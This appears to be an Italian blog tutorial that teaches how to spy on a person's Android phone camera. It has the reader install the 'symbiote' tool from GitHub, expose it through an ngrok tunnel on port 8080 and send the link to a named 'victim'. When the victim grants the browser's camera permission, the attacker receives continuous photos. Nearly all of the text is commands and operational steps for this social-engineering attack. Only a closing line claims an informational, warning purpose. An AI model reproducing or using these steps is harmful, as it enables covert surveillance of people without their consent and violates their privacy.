In questa guida vi mostro una tecnica di hacking che permette di accedere alla webcam di uno smartphone Android, sia anteriore che posteriore. Usando questa tecnica sfruttiamo il famoso Social-Engineering. Per chi non ha visto altri articoli riguardanti il Social Engineering ve lo spiego io in questa guida. Il sistema operativo che useremo si chiama Kali Linux ma possiamo usare anche una distribuzione italiana chiamata Parrot Security.
Social Engineering:
Il social engineering o meglio conosciuto in italiano come attacco di ingegneria sociale, è un attacco che permette al cyber-criminale di cercare di studiare la vittima al fine di ricavare più informazioni possibili per ricavare dei dati di accesso. Spesso questa tecnica può essere collegata anche con la psicologia informatica, in quanto se un cyber-criminale studia bene la vittima tramite questo attacco può arrivare a capire bene la vittima e a come spingerla nel farla cadere nella trappola d’attacco.
Configurazione symbiote:
Come primo passaggio dobbiamo recarci sul sito GitHub e scaricare symbiote un tools molto intelligente in grado di creare un link che può tramite il permesso consentito dall’utente accedere alla webcam sia Anteriore che Posteriore e vedere in tempo reale ogni foto in pochissimi instanti.
Ora aprite il terminale Linux e digitate questi comandi:
sudo apt update
Adesso installiamo python3 se non è presente usando questo comando:
sudo apt install python -y
Successivamente scrivere:
sudo apt install wget -y
Continuiamo nel scrivere i prossimi comandi d’installazione:
sudo apt install php -y
Nel prossimo campo scriviamo i prossimi comandi:
sudo apt install openssh-client -y
Procediamo con gli ultimi passaggi di installazione:
sudo apt install jq -y
sudo ssh-keygen -q -t rsa -N '' -f ~/.ssh/id_rsa <</dev/null 2>&1
Installazione symbiote:
In questo metodo andiamo a scaricare il software da Github usando il seguente comando:
git clone https://github.com/hasanfirnas/symbiote
Adesso entriamo nella directory con il comando:
cd symbiote
ora scriviamo il seguente comando per fare partire il programma:
python3 symbiote.py
Premiamo ora come nella figura sotto il tasto Y per confermare che lo strumento abbia tutti i componenti necessari per fare partire tutto.
Appena il software non rileva i pacchetti che gli servono automaticamente tramite uno script scritto all’interno dello strumento, i pacchetti si installano automaticamente.
Avviate di nuovo il programma con il seguente comando:
sudo python3 symbiote.py
Partirà lo strumento, appena sarete su questa schermata vi chiede che porta volete usare da 1 a 65535 io vi consiglio di usare come ho fatto io la porta 8080 quindi scrivetela e premete <<invio>>.
Adesso abbiamo bisogno di uno strumento chiamato ngrok per chi non sa come installarlo io, ho scritto una guida <<Come registrarsi e scaricare ngrok>>. Una volta installato tutto apriamo ngrok e scriviamo nel terminale:
ngrok http 8080
Torniamo ora sul programma symbiote e selezioniate quale telecamere volete utilizzare, nel mio caso uso quella posteriore. Quindi scrivete il numero corrispondete alla selezione presente nel terminale nel mio caso <<2>>.
Non resta che selezionare il servizio che abbiamo scaricato nel nostro caso <<ngrok>> quindi premiamo <<1>>.
Come vedete avrete due terminali davanti, uno che gestisce la pagina per accedere alla webcam e l’altra il serverweb dove viene caricata la pagina. A questo punto copiate il link dove sta scritto <<Forwarding>> esempio: https://ngrokio123123124f.free mandatelo alla vittima. Ora non resta che attendere che la vittima apre il link e che acconsente la notifica sul Browser di accedere alla webcam. A questo punto vedrete che il programma scatterà foto in continuazione infatti il risultato della mia fotocamera e la tovaglia del tavolo.
“Foto catturata dalla webcam”
Ulteriori informazioni:
Questa guida è stata scritta a scopo informativo, e per avvertire le persone della pericolosità dei link sospetti e di non aprirli mai. Con questo voglio ringraziare tutti per la lettura dell’articolo.